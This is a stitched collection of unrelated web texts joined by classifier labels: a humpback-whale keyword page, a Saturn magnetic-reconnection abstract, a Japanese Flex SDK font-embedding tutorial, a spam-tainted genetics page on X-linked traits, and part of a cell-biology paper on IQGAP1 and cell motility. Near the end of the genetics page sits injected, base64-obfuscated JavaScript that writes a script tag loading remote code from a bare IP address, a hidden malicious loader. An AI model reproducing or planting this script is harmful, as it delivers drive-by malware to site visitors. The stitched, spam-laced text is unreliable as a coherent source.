Sperm Whales 1. And finback, humpbacks and sperm whales are a common sight in northwest Mexico's Sea of Cortez. (Web site) 2. But individual humpbacks appear to always play the some position in a hunting team, unlike the rotation of tasks apparent in sperm whales. (Web site) Right Whales 1. Humpbacks, along with the bowhead, blue and right whales, are some of the most endangered species on the earth. (Web site) Blue Whale 1. Humpbacks belong to a group of whales called rorquals, that includes the fin whale and the blue whale, the largest animal that has ever lived. (Web site) 2. Blue whale calls were detected on all but two of 76 dives, and humpbacks were detected on 20% of dives. (Web site) Blue Whales 1. Baleen whales include humpbacks, blue whales, and gray whales. (Web site) 2. The plates are black and measure up to a metre long in Blue whales (80 cm in Humpbacks). (Web site) 3. Like the Humpbacks, Blue Whales often shift to various feeding locations off central California in search of krill concentrations. (Web site) Migrating 1. The Indian Ocean has a northern coastline, while the Atlantic and Pacific oceans do not, thereby preventing the humpbacks from migrating to the pole. (Web site) Summer 1. In spring, summer, and fall at the Farallon Islands off San Francisco, Monterey Bay, one may see humpbacks, greys, and blue whales. 2. In the summer, humpbacks are found in high latitude feeding grounds such as the Gulf of Maine in the Atlantic and Gulf of Alaska in the Pacific. (Web site) 3. 
Humpbacks are the first baleen #whales shown to form lasting bonds, with female friends reuniting each summer. (Web site) Late Spring 1. After traveling up from the Caribbean, humpbacks in our area stay in the Gulf of Maine from late spring to early fall feeding. Estimated 1. It is estimated that during the 20th century at least 200,000 Humpbacks were taken, reducing the global population by over 90%. (Web site) 2. There are now an estimated 18,000 to 20,000 humpbacks in the North Pacific, up from just 1,400 in the mid-1960s. 3. It is estimated that whaling took 250,000 humpbacks. (Web site) World Population 1. During the first three-quarters of the 20th century, at least 200,000 humpbacks were killed, slashing the world population by 90 per cent. Tropical Waters 1. Humpbacks spend the summer months in the polar waters, and then follow specific migratory routes to the tropical waters to wait out the winter. (Web site) Southern Japan 1. These include humpbacks that spend the winter in tropical waters off southern Japan and the Philippines and the summer near Russia's Far East coast. (Web site) Whale Watching Tours 1. Humpbacks are among the most spotted species during whale watching tours all around the country. (Web site) 2. Whale Watching Tours have the opportunity to view the Humpbacks in the summer months only. (Web site) Categories 1. Life > Animals > Specific Animals > Whales 2. Feeding 3. Flippers 4. Orcas 5. Fins Related Keywords * Australian Waters * Backs * Baleen Whales * Blubber * Breach * Breaching * Breeding Grounds * Brink * Bubble Net * Bubble Nets * Bushy Blow * Calf * Calves * Calving * Cetaceans * Chins * Diverse Repertoire * Dolphins * Dorsal Fin * Entangled * Feed * Feeding * Feeding Ground * Feeding Grounds * Females * Fin * Finbacks * Fins * Fin Whales * Fish * Flipper * Flippers * Flukes * Gray * Grays * Hawaii * Herring * Icy Waters * Krill * Lunging * Males * Male Humpbacks * Mate * Mates * Mating * Migratory * Minke * Minkes * Minke Whales * North Atlantic * North Pacific * Ocean * Oceans * Orcas * Populations * Prey * Scientists Estimate * Slap * Slow Swimmers * Southern Hemisphere * Southern Right Whale * Southern Right Whales * Species * Surface * Tail * Tails * Tail Slapping * Third Class * Throat * Throat Grooves * Ton * Tons * Tubercles * Underside * Water * Waters * Whale * Whales * Whale Watchers * Whaling * Winter Months * Works Similarly 1. Books about "Humpbacks" in Amazon.com Book: Keywen Category Structure   Short phrases about "Humpbacks"   Originally created: April 04, 2011.   Links checked: July 23, 2013.   Please send us comments and questions by this Online Form   Please click on Move Up to move good phrases up. 0.0209 sec. a=1..
__label__pos
0.991811
Rotationally driven magnetic reconnection in Saturn’s dayside Ruilong Guo, Zhonghua Yao, Y. Wei, Licia Ray, Jonathan Rae, Chris Arridge, Andrew Coates, Peter Delamere, N. Sergis, P. Kollman, Denis Grodent, William Dunn, J. H. Waite, J. L. Burch, Z. Y. Pu, B. Palmaerts, Michelle Dougherty Research output: Contribution to journalArticlepeer-review 26 Citations (Scopus) Abstract Magnetic reconnection is a key process that explosively accelerates charged particles, generating phenomena such as nebular flares, solar flares and stunning aurorae. In planetary magnetospheres, magnetic reconnection has often been identified on the dayside magnetopause and in the nightside magnetodisc, where thin-current-sheet conditions are conducive to reconnection. The dayside magnetodisc is usually considered thicker than the nightside due to the compression of solar wind, and is therefore not an ideal environment for reconnection. In contrast, a recent statistical study of magnetic flux circulation strongly suggests that magnetic reconnection must occur throughout Saturn’s dayside magnetosphere. Additionally, the source of energetic plasma can be present in the noon sector of giant planetary magnetospheres. However, so far, dayside magnetic reconnection has only been identified at the magnetopause. Here, we report direct evidence of near-noon reconnection within Saturn’s magnetodisc using measurements from the Cassini spacecraft. The measured energetic electrons and ions (ranging from tens to hundreds of keV) and the estimated energy flux of ~2.6 mW m–2 within the reconnection region are sufficient to power aurorae. We suggest that dayside magnetodisc reconnection can explain bursty phenomena in the dayside magnetospheres of giant planets, which can potentially advance our understanding of quasi-periodic injections of relativistic electrons and auroral pulsations. Original languageEnglish Pages (from-to)640-645 Number of pages6 JournalNature Astronomy Volume2 Issue number8 Early online date4 Jun 2018 DOIs Publication statusPublished - Aug 2018 Externally publishedYes Fingerprint Dive into the research topics of 'Rotationally driven magnetic reconnection in Saturn’s dayside'. Together they form a unique fingerprint. Cite this
__label__pos
0.738182
[AS3] FlexSDK3とFlexSDK4でのFont Embed, TextFieldとTextLayoutFramework 2011/07/10 埋め込み方法の違いなどのまとめ ■FlexSDK 3.x とFlex SDK 4.x Flex SDK 3.x >> Minimum Player version 9.0.124 Flex SDK 4.x >> Minimum Player version 10.0 4.5は10.2からになってた ■TextFieldとText Layout Framework TextField Text Layout Framework データが軽くてすむ。 普通のやり方だと動的に縦組ができない。 (静止テキストは可能) 取り扱いが楽。 Player 9.0 higher フォントの埋め込みは非CFF データが若干重い。 縦組ができる。 取り扱いが面倒。 Player 10.0 higher。 フォントの埋め込みは要 CFF CFFとはCompact Font Formatのことで、従来の埋め込み方法よりもデータが軽くなるとか。 >> Compact Font Format Text Layout Framework (TFL)については、 >> http://labs.adobe.com/technologies/textlayout/ 上のページからリンクされているPDFを読むと、どんなもんで、どんなことがやれることがわかってよいです。 Text Layout Framework Overview(pdf) そんで、さきほどのPDFと下記ページにあるDownload examples.を落としてきてやり方をみると、 かなりできるようになるのではないかと。 Text Layout Framework(Adobe Open Source) フォントの埋め込み方法については >> Embedded fonts and the Text Layout Framework 縦書き方法は「にゃあプロジェクト」さんに書いてありました。どうもです。 [TLF] TextLayoutFrameworkだ! (1) Flex SDK 3.x での埋め込み。TextFieldよう package { import flash.display.Sprite; import flash.text.TextField; import flash.text.TextFieldAutoSize; import flash.text.TextFormat; [SWF(width="400", height="400",frameRate="30",backgroundColor="0xffffff")] public class SDK3Test extends Sprite { [Embed(source='A-OTF-FutoGoB101Pro-Bold.otf', fontName='MyFutogo', fontWeight="Bold", mimeType='application/x-font' )] private var _myFontClass:Class; public function SDK3Test() { var textfield:TextField = new TextField(); var textFormat:TextFormat = new TextFormat(); textFormat.font = "MyFutogo"; textFormat.size = 21; textfield.autoSize = TextFieldAutoSize.LEFT; textfield.defaultTextFormat = textFormat; textfield.text = "Hello embed font!"; textfield.embedFonts = true; addChild(textfield); textfield.x = 30; textfield.y = 30; } } } EmbedのところがfontName, fontWeightを指定するところに注目 SDK 4.x でフォント埋め込みTextFieldよう package { import flash.display.Sprite; import flash.text.TextField; import flash.text.TextFieldAutoSize; import flash.text.TextFormat; [SWF(width="400", height="400",frameRate="30",backgroundColor="0xffffff")] public class SDK4Test extends Sprite { //Unicode Range Basic Latin [Embed(source='A-OTF-FutoGoB101Pro-Bold.otf', fontFamily = "MyFutogo", embedAsCFF = "false", unicodeRange = "U+0020-002F,U+0030-0039,U+003A-0040,U+0041-005A,U+005B-0060,U+0061-007A,U+007B-007E", mimeType='application/x-font' )] private var _myFontClass:Class; public function SDK4Test() { var textfield:TextField = new TextField(); var textFormat:TextFormat = new TextFormat(); textFormat.font = "MyFutogo"; textFormat.size = 21; textfield.autoSize = TextFieldAutoSize.LEFT; textfield.defaultTextFormat = textFormat; textfield.embedFonts = true; textfield.text = "Hello embed font!"; addChild(textfield); textfield.x = 30; textfield.y = 30; } } } fontName→fontFamilyに変更。fontWeightがなし。 embedAsCFFを追加してfalseに。 unicodeRangeを指定可能 SDK 4.x でフォント埋め込みTLFよう package { import flash.display.Sprite; import flash.geom.Rectangle; import flash.text.engine.FontLookup; import flash.text.engine.RenderingMode; import flash.text.engine.TextLine; import flashx.textLayout.factory.StringTextLineFactory; import flashx.textLayout.formats.TextLayoutFormat; [SWF(width="400", height="400",frameRate="30",backgroundColor="0xffffff")] public class SDK4CFF extends Sprite { //Unicode Range Basic Latin [Embed(source='A-OTF-FutoGoB101Pro-Bold.otf', fontFamily = "MyFutogo", embedAsCFF = "true", unicodeRange = "U+0020-002F,U+0030-0039,U+003A-0040,U+0041-005A,U+005B-0060,U+0061-007A,U+007B-007E", mimeType='application/x-font' )] private var _myFontClass:Class; public 
function SDK4CFF() { var cf:TextLayoutFormat = new TextLayoutFormat(); cf.fontSize = 21; cf.fontFamily = "MyFutogo"; cf.fontLookup = FontLookup.EMBEDDED_CFF; cf.renderingMode = RenderingMode.CFF; var factory:StringTextLineFactory = new StringTextLineFactory(); factory.text = "Hello embed font!"; factory.compositionBounds = new Rectangle(30, 30, 200, 50); factory.spanFormat = cf; factory.textFlowFormat = cf; factory.createTextLines(onTextLineCreated); } private function onTextLineCreated(tl:TextLine):void { addChild(tl); } } } embedAsCFFをtrueにする。 と、これでFlexでフォントを埋め込む方法がわかってよかった。 LINEで送る Pocket 自作iPhoneアプリ 好評発売中! フォルメモ - シンプルなフォルダつきメモ帳 ジッピー電卓 - 消費税や割引もサクサク計算! ページトップへ戻る
__label__pos
0.880902
What exactly is an intercourse linked trait – The sex chromosomes are one set What exactly is an intercourse linked trait – The sex chromosomes are one set In humans, along with in a great many other pets plus some flowers, the intercourse regarding the person is dependent upon intercourse chromosomes. The intercourse chromosomes are one set of non-homologous chromosomes. As yet, we now have just considered inheritance habits among non-sex chromosomes, or autosomes. As well as 22 homologous pairs of autosomes, individual females have homologous couple of X chromosomes, whereas peoples men have actually an XY chromosome set. The Y chromosome is much shorter and contains many fewer genes although the Y chromosome contains a small region of similarity to the X chromosome so that they can pair during meiosis. Each time a gene being examined occurs on the X chromosome, although not regarding the Y chromosome, it is known to be X-linked. Figure 1. In Drosophila, the gene for attention color is found in the X chromosome. Clockwise from top left are brown, cinnabar, sepia, vermilion, white, and red. Red attention color is wild-type and it is principal to eye color that is white. Eye color in Drosophila had been one of the primary traits that are x-linked be identified. Thomas search Morgan mapped this trait to your X chromosome in 1910. Like people, Drosophila men have actually an XY chromosome set, and females are XX. In flies, the wild-type eye color is red (X W ) which is principal to white attention color (X w ) (Figure 1). Due to the located area of the eye-color gene, reciprocal crosses usually do not produce the exact same offspring ratios. Men are reported to be hemizygous, simply because they have just one allele for almost any X-linked attribute. Hemizygosity helps make the information of recessiveness and dominance unimportant for XY men. Drosophila men lack a 2nd copy that is allele the Y chromosome; that is, their genotype can only just be X W Y or X w Y. in comparison, females have actually two allele copies of the gene and may be X W X W , X W X w , or X w X w . Within an X-linked cross, the genotypes of F1 and F2 offspring depend on whether the recessive trait ended up being expressed by the male or perhaps the feminine within the P0 generation. Pertaining to Drosophila attention color, if the P0 male expresses the white-eye phenotype and the feminine is homozygous red-eyed, all people in the F1 generation exhibit red eyes. The F1 females are heterozygous (X W X w ), therefore the men are typical X W Y, having received their X chromosome from the homozygous dominant P0 female and their Y chromosome from the P0 male. a cross that is subsequent the X W X w feminine while the X W Y male would create just red-eyed females (with X W X W or X W X w genotypes) and both red- and white-eyed men (with X W Y or X w Y genotypes). Now, think about a cross from a homozygous female that is white-eyed a male with red eyes (Figure 2). The F1 generation would show just heterozygous red-eyed females (X W X w ) and just white-eyed males (X w Y). 1 / 2 of the F2 females is red-eyed (X W X w ) and half is white-eyed (X w X w ). the russian bride kristina pimenova Similarly, 50 % of the F2 males could be red-eyed (X W Y) and half is white-eyed (X w Y). Figure 2. Punnett square analysis can be used to look for the ratio of offspring from a cross between a red-eyed male good fresh good fresh fruit fly and a white-eyed fruit fly that is female. 
Exactly just What ratio of offspring would derive from a cross from a white-eyed male and a female that is heterozygous for red attention color? Discoveries in good fresh fresh fruit fly genetics could be put on genetics that are human. Whenever a parent that is female homozygous for a recessive X-linked trait, she’ll pass the trait on to 100 % of her offspring. Her male offspring are, consequently, destined to convey the trait, because they will inherit their father’s Y chromosome. In people, the alleles for many conditions (some types of color loss of sight, hemophilia, and dystrophy that is muscular are X-linked. Females that are heterozygous of these conditions are reported to be providers and might perhaps perhaps not display any effects that are phenotypic. These females will pass the illness to 50 % of their sons and certainly will pass provider status to 50 % of their daughters; consequently, recessive traits that are x-linked more often in men than females. The gender with the non-homologous sex chromosomes is the female rather than the male in some groups of organisms with sex chromosomes. This is actually the instance for many birds. In this instance, sex-linked faculties may well be more more likely to can be found in the feminine, by which they’ve been hemizygous. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
__label__pos
0.744565
Journal of Cell Science partnership with Dryad Journal of Cell Science makes data accessibility easy with Dryad Summary IQGAP1 has been implicated as a regulator of cell motility because its overexpression or underexpression stimulates or inhibits cell migration, respectively, but the underlying mechanisms are not well understood. Here, we present evidence that IQGAP1 stimulates branched actin filament assembly, which provides the force for lamellipodial protrusion, and that this function of IQGAP1 is regulated by binding of type 2 fibroblast growth factor (FGF2) to a cognate receptor, FGFR1. Stimulation of serum-starved MDBK cells with FGF2 promoted IQGAP1-dependent lamellipodial protrusion and cell migration, and intracellular associations of IQGAP1 with FGFR1 – and two other factors – the Arp2/3 complex and its activator N-WASP, that coordinately promote nucleation of branched actin filament networks. FGF2 also induced recruitment of IQGAP1, FGFR1, N-WASP and Arp2/3 complex to lamellipodia. N-WASP was also required for FGF2-stimulated migration of MDBK cells. In vitro, IQGAP1 bound directly to the cytoplasmic tail of FGFR1 and to N-WASP, and stimulated branched actin filament nucleation in the presence of N-WASP and the Arp2/3 complex. Based on these observations, we conclude that IQGAP1 links FGF2 signaling to Arp2/3 complex-dependent actin assembly by serving as a binding partner for FGFR1 and as an activator of N-WASP. Introduction IQGAP1 (Weissbach et al., 1998) is an ∼380 kDa homodimeric protein (Bashour et al., 1997) that is widely expressed among vertebrate cell types from early embryogenesis (Cupit et al., 2004; Yamashiro et al., 2003) through adulthood (Bashour et al., 1997; Takemoto et al., 2001; Yamaoka-Tojo et al., 2004; Zhou et al., 2003). Several sequentially arranged functional domains enable IQGAP1 to bind directly to a rich spectrum of cytoskeletal, adhesion and regulatory proteins (Briggs and Sacks, 2003; Mateer and Bloom, 2003), including F-actin (Bashour et al., 1997; Fukata et al., 1997), the microtubule plus end capping protein, CLIP-170 (Fukata et al., 2002), E-cadherin (Kuroda et al., 1998), β-catenin (Kuroda et al., 1998), activated forms of the small G proteins, Cdc42 and Rac1 (Hart et al., 1996; Kuroda et al., 1996), calmodulin (Mateer et al., 2002), MAP kinases (Roy et al., 2004; Roy et al., 2005), the tumor suppressor protein, APC (Watanabe et al., 2004), and VEGFR2, the type 2 receptor for vascular endothelial growth factor, or VEGF (Yamaoka-Tojo et al., 2004). Like many of its associating proteins, IQGAP1 preferentially accumulates in the cell cortex, where it is most concentrated at actin filament-rich sites, such as lamellipodia and cell-cell junctions (Bashour et al., 1997; Hart et al., 1996; Kuroda et al., 1998; Yamashiro et al., 2003). Regulation of cell motility and morphogenesis are among the most conspicuous cell biological functions of IQGAP1. The principal evidence for this conclusion is that siRNA-mediated knockdown of IQGAP1 potently inhibited cell motility (Mataraza et al., 2003; Yamaoka-Tojo et al., 2004), whereas cell migration (Mataraza et al., 2003) and neurite outgrowth (Li et al., 2005) were enhanced in cells overexpressing IQGAP1. Regulation of cell motility upstream of IQGAP1 has not been widely explored, but IQGAP1-dependent motility of endothelial cells was found to be triggered by binding of VEGF to VEGFR2, and subsequent recruitment of IQGAP1 to the cytoplasmic tail of VEGFR2 (Yamaoka-Tojo et al., 2004). 
Binding of a specific extracellular ligand to its cognate cell surface receptor thus represents at least one mechanism by which IQGAP1 can promote cell motility. Knowledge of the downstream pathways by which IQGAP1 regulates cell motility has remained equally limited. One possible mechanism involves IQGAP1-dependent regulation of intercellular adhesion. IQGAP1 has been reported to inhibit cell-cell adhesion by binding to E-cadherin and β-catenin, thereby blocking interaction of β-catenin with α-catenin and uncoupling the adhesion machinery from the actin cytoskeleton (Kuroda et al., 1998). This inhibition of cell-cell adhesion by IQGAP1 can be overcome by binding of GTP-Cdc42 or GTP-Rac1 to IQGAP1, which dissociates IQGAP1 from E-cadherin and β-catenin (Fukata et al., 1999). At least one other potential explanation for the role of IQGAP1 in cell motility is well worth considering. The direct binding of IQGAP1 to F-actin in vitro (Bashour et al., 1997; Fukata et al., 1997) and its extensive colocalization with actin filaments in lamellipodia (Bashour et al., 1997; Yamashiro et al., 2003) could reflect a role for IQGAP1 in controlling cell motility through regulation of actin dynamics. The force for lamellipodial protrusion, and by extension, cell motility, is provided by assembly of branched actin filament networks at the leading edges of motile cells. Assembly of these networks is thought to involve the Arp2/3 complex (Machesky et al., 1994), which nucleates new filaments from the sides of pre-existing filaments, and activators of the Arp2/3 complex, such as neural Wiskott-Aldrich Syndrome protein (N-WASP), WASP and the WAVE proteins, which themselves require activation by additional factors (Pollard and Borisy, 2003). The study described here employed a combination of cell biological, biochemical and biophysical approaches to determine if regulation of cortical actin assembly by IQGAP1 underlies its critical role in cell motility. We demonstrate that IQGAP1 is part of the molecular machinery that stimulates branched actin filament nucleation and lamellipodial protrusion, and present evidence that activation of growth factor receptors is a common mechanism to engage this function of IQGAP1. Furthermore, because numerous proteins involved in promoting branched actin filament assembly failed to accumulate at the cell surface following receptor activation of IQGAP1-depleted cells, our results suggest that IQGAP1 coordinates the recruitment and activation of these proteins at the leading edge of motile cells.

Results

FGF2 stimulates cell motility through IQGAP1

To test the hypothesis that IQGAP1 regulates actin filament dynamics in response to activation of cell surface receptors other than VEGFR2, we began by examining motility of Madin-Darby bovine kidney (MDBK) cells stimulated with fibroblast growth factor 2 (FGF2). We chose FGF2 for this study because one of its principal receptors is FGFR1, whose cytoplasmic domain contains a region with 55% amino acid identity to the IQGAP1-binding region of VEGFR2 (Yamaoka-Tojo et al., 2004). Cell motility was induced in serum-starved MDBK cells by FGF2, and found to be tightly coupled to IQGAP1 expression. Wounds were scraped into confluent monolayers of serum-starved cells that had been treated with siRNA to reduce IQGAP1 protein levels to ∼20% of normal (Fig. 1A) and FGF2 was added to the cultures 2 hours later. As shown by phase contrast microscopy in Fig. 1B (also see Fig. 5C for quantification), within 7 hours after introduction of FGF2, nearly full wound closure was observed in control cultures treated with scrambled RNA (scrRNA), but wounds scraped in confluent cultures of IQGAP1-depleted cells closed only partially. Most wound closure in control cultures was dependent on FGF2, because broad wounds persisted for more than 24 hours in cultures that were not stimulated with FGF2. We thus conclude that FGF2 stimulates migration of MDBK cells through a pathway that requires IQGAP1. The impaired ability of IQGAP1-depleted cells to migrate in the wound healing assay resulted from a dramatic inhibition of FGF2-stimulated lamellipodial dynamics. Cells that had been treated with IQGAP1 siRNA or scrRNA were subcultured at low density, allowed to attach and spread on coverslips in serum-containing medium overnight, transferred to serum-free medium for 18 hours, and finally stimulated with FGF2. Images of individual cells that were not in direct contact with any neighboring cells were recorded by time-lapse, phase contrast microscopy before and after FGF2 stimulation. Timelines of lamellipodial protrusion and retraction were displayed as kymographs (Hinz et al., 1999), which facilitated visual and quantitative comparisons of lamellipodial behavior in cells containing normal versus diminished levels of IQGAP1. Typical kymographs are shown in Fig. 2A. The control cell kymograph demonstrated a high density of sharp, steadily advancing narrow peaks, each of which represented a rapid cycle of lamellipodial protrusion and retraction that resulted in net forward movement of the cell margin. By comparison, the kymograph of the IQGAP1-depleted cell contained only a few, much broader peaks, and indicated little, if any, advance of the cell margin.

Fig. 1. IQGAP1 is required for FGF2-stimulated migration of MDBK cells. (A) MDBK cells were transfected with IQGAP1-specific siRNA or scrambled RNA (scrRNA) using a Nucleofector. To allow direct visual comparison of IQGAP1 levels in the two samples by western blotting, a concentration series of each cell extract was analyzed at the indicated relative dilutions. Note that siRNA reduced the IQGAP1 level to ∼20% of normal, but had no effect on cellular actin content. (B) Confluent monolayers were then serum-starved for 8 hours, wounded with a micropipette tip, and 2 hours later were stimulated with 25 ng/ml FGF2. Note that movement of IQGAP1-depleted cells into the wound, as seen after 7 hours of FGF2 exposure, was severely impaired, and that broad wounds persisted for more than 24 hours after wounding in both scrRNA-treated and IQGAP1-depleted cells that were not stimulated with FGF2.

The impression obtained from this representative pair of kymographs was reinforced by quantitative analysis of three distinct parameters of lamellipodial dynamics: the frequency of forming protrusions, the velocity with which protrusions advanced, and the persistence of protrusions (Fig. 2B; and for detailed statistics, including post-hoc comparisons, see supplementary material, Table S1). Comparison of control and IQGAP1-depleted cells prior to FGF2 stimulation indicated that their protrusion frequencies were indistinguishable, but that protrusions in control cells had a 34% higher velocity and a 39% lower persistence.

Fig. 2. Reduced lamellipodial dynamics in IQGAP1-depleted cells. Individual cells in sparse cultures that were serum-starved for 18 hours were imaged by phase contrast, time-lapse microscopy for 5 minutes before FGF2 was added to a final concentration of 25 ng/ml, and for 10 minutes thereafter. (A) Kymographic images (right panels) obtained from the indicated regions of interest (roi) at the margins of individual cells (left panels) treated with scrRNA or siRNA. Note how dynamic and motile the cell margin was in the control, scrRNA-treated cells compared to the cell depleted of IQGAP1 with siRNA. (B) Comparative responses of scrRNA-treated control (–) and IQGAP1 siRNA-treated (+) cells to FGF2 stimulation. The three parameters of lamellipodial dynamics that were measured before and after FGF2 stimulation were frequency, velocity and persistence of protrusion. The raw data were obtained from 180 regions of interest (roi) in 19 scrRNA-treated control cells, and from 180 roi in 21 siRNA-treated cells. Error bars indicate s.e.m. Differences between groups were analyzed using a one-way ANOVA test. Statistically significant differences at α=0.001 are indicated by * for control versus siRNA-treated cells after FGF2 exposure (see supplementary material Table S1 for detailed statistics, including post-hoc comparisons).

The net conclusion is that control cells, but not IQGAP1-deficient cells, respond to FGF2 by making more dynamic lamellipodia. After FGF2 stimulation, lamellipodial behavior was strikingly different between control and IQGAP1-depleted cells. Addition of FGF2 to control cells caused protrusion frequency and velocity to increase by 224% and 64%, respectively, but protrusion persistence was unchanged. By contrast, addition of FGF2 to IQGAP1-depleted cells did not change the frequency of protrusions or their velocity, but did cause protrusion persistence to increase by 105%. Loss of IQGAP1, therefore, potently inhibited the ability of FGF2 to induce protrusions and increase the speeds at which they advanced, but caused protrusions that were able to form following FGF2 stimulation to be more long lasting. Despite this increased protrusion persistence, the net result of knocking down IQGAP1 was to prevent FGF2 from inducing productive protrusions. It is likely that the relatively inactive lamellipodia in IQGAP1-deficient cells stimulated with FGF2 accounted for their reduced migration in wound healing assays (Fig. 1B and Fig. 5C).

FGF2 induces intracellular association of IQGAP1 with N-WASP, the Arp2/3 complex and FGFR1

Because waves of lamellipodial protrusion are associated with periods of actin assembly (Pollard and Borisy, 2003), and IQGAP1 concentrates in lamellipodia and binds F-actin (Bashour et al., 1997), we investigated whether proteins that regulate actin assembly associated with IQGAP1 after FGF2 stimulation. IQGAP1 was immunoprecipitated from low-density cultures containing islands of relatively small numbers of cells (approximately 10-100 cells per island) before FGF2 stimulation and at various time points thereafter. As a control for non-specific immunoprecipitation, the tau-1 antibody to tau, which is not expressed in MDBK cells, was substituted for anti-IQGAP1, 10 minutes after FGF2 stimulation. The IQGAP1 immunoprecipitates contained time-dependent increases in coimmunoprecipitated N-WASP, Arp3 and FGFR1 beginning as early as 10 minutes after FGF2 stimulation, but none of the proteins assayed by western blotting were immunoprecipitated by anti-tau (Fig. 3A).
Arp3 is a subunit of the Arp2/3 complex (Machesky et al., 1994), which coordinates with N-WASP to assemble branched actin filament networks (Pollard and Borisy, 2003). WAVE2, a different Arp2/3 complex activator that has been implicated specifically in lamellipodial protrusion (Yamazaki et al., 2003; Yan et al., 2003), was readily detectable in MDBK cell lysates by immunoblotting, but did not coimmunoprecipitate with IQGAP1 before or after FGF2 stimulation of serum-starved cells (not shown). Using purified proteins for in vitro binding assays, we determined that IQGAP1 binds directly to the cytoplasmic domain of FGFR1 and to N-WASP, and acts as a bridge for indirect association of FGFR1 and N-WASP (Fig. 3B and Fig. 8C).

Fig. 3. FGF2 stimulates recruitment of IQGAP1, N-WASP, Arp2/3 complex and FGFR1 to lamellipodia. (A) Low-density cultures of serum-starved MDBK cells were stimulated with FGF2, and lysed at various times thereafter. At each indicated time point, IQGAP1 was immunoprecipitated out of the lysates with monoclonal anti-IQGAP1, and the immunoprecipitates were analyzed by immunoblotting with antibodies to IQGAP1 (polyclonal), N-WASP, Arp3 and FGFR1. As a control for non-specific immunoprecipitation, the tau-1 monoclonal antibody to tau, which is not expressed in MDBK cells, was substituted for monoclonal anti-IQGAP1, 10 minutes after FGF2 stimulation. Note that the IQGAP1 immunoprecipitates contained time-dependent increases in the levels of coimmunoprecipitated N-WASP, Arp3 and FGFR1, and that none of the proteins assayed by western blotting were immunoprecipitated by anti-tau. (B) Glutathione-Sepharose 4B beads were loaded with a fusion protein of the FGFR1 cytoplasmic tail coupled to GST, or with GST alone, and the beads were then mixed with IQGAP1, N-WASP, or both, and finally immunoblotting was used to detect any IQGAP1 or N-WASP that may have bound to the beads. Immunoblotting demonstrated direct binding of IQGAP1 and indirect, IQGAP1-dependent association of N-WASP with GST-FGFR1 tail, but not with GST.

Low-density MDBK cultures were also stained by double fluorescence microscopy for IQGAP1 plus FGFR1, N-WASP, Arp3 or F-actin. As shown in Fig. 4, FGF2 induced recruitment of IQGAP1 and the other four proteins to lamellipodia, where they colocalized extensively. These results place IQGAP1 predominantly within a cortical region where actin filament nucleation occurs and FGFR1 accumulates beyond basal levels following FGF2 stimulation. In FGF2-stimulated cells depleted of IQGAP1 with siRNA, however, FGFR1, N-WASP and Arp3 were not recruited to the cortex, and F-actin-rich lamellipodia failed to form.

Impaired wound healing by N-WASP-depleted MDBK cells

The evidence presented to this point raised the possibility that N-WASP, like IQGAP1, is required in MDBK cells for FGF2-stimulated lamellipodial protrusion and cell motility. To test this hypothesis, MDBK cells were depleted of N-WASP with siRNA, and tested for FGF2-stimulated wound healing. As illustrated in Fig. 5, wound healing in N-WASP-deficient cultures was severely impaired, and quantitatively similar to the poor wound healing observed in IQGAP1-depleted cultures. Thus, in contrast to other cellular systems in which WAVE2 was found to support lamellipodial advance (Yamazaki et al., 2003; Yan et al., 2003), FGF2-stimulated lamellipodial protrusion in MDBK cells requires N-WASP.

IQGAP1 stimulates branched actin filament nucleation through N-WASP and the Arp2/3 complex

The requirement for both IQGAP1 and N-WASP in FGF2-dependent cell migration, and the intracellular association of IQGAP1, N-WASP and the Arp2/3 complex, suggested that these three factors work in concert to stimulate actin filament nucleation. This hypothesis was verified using a spectrofluorometric assay for assembly of pyrene-labeled actin (Bryan and Coluccio, 1985) (Fig. 6A). In the presence of 1.3 μM actin, 50 nM Arp2/3 complex and 50 nM N-WASP, the maximum actin assembly rate (Vmax) and shortest lag time to reach Vmax were achieved at an IQGAP1 concentration of 30 nM. Compared to samples containing 30 nM IQGAP1, control samples that lacked IQGAP1 assembled with an ∼50% slower Vmax and took four to five times longer to reach Vmax. Lesser stimulation of actin assembly, or none at all, was observed at lower and higher IQGAP1 concentrations. IQGAP1 thus stimulates actin nucleation by the Arp2/3 complex and N-WASP, but within a narrow concentration range, suggesting that the effects of IQGAP1 on actin assembly reflect a concentration-dependent balance between stimulatory and inhibitory activities. Similar results were obtained at Arp2/3 complex concentrations of 30-100 nM, and at N-WASP concentrations of 30-350 nM (as in Fig. 7A). IQGAP1 did not stimulate actin assembly appreciably in the absence of other factors, and stimulation required the presence of both the Arp2/3 complex and N-WASP (Fig. 6B). Taken together, these results establish IQGAP1 as a novel activator of N-WASP.

Fig. 4. IQGAP1-dependent recruitment of N-WASP, Arp3 and FGFR1 to the cell periphery after FGF2 stimulation. Immunofluorescence microscopy revealed co-recruitment and colocalization of IQGAP1, N-WASP, Arp3 and FGFR1 to lamellipodia after FGF2 stimulation for 10 minutes, of low-density cultures of serum-starved MDBK cells containing IQGAP1 (Control cells). FGF2 was unable to recruit N-WASP, Arp3 and FGFR1 to cell margins in IQGAP1-deficient, siRNA-treated cells. To improve visualization of cell margins and intracellular details in IQGAP1-depleted cells, micrograph exposures for the siRNA samples were twice as long in the TRITC channel and 4.5 times longer in the FITC channel as they were for the scrRNA samples.

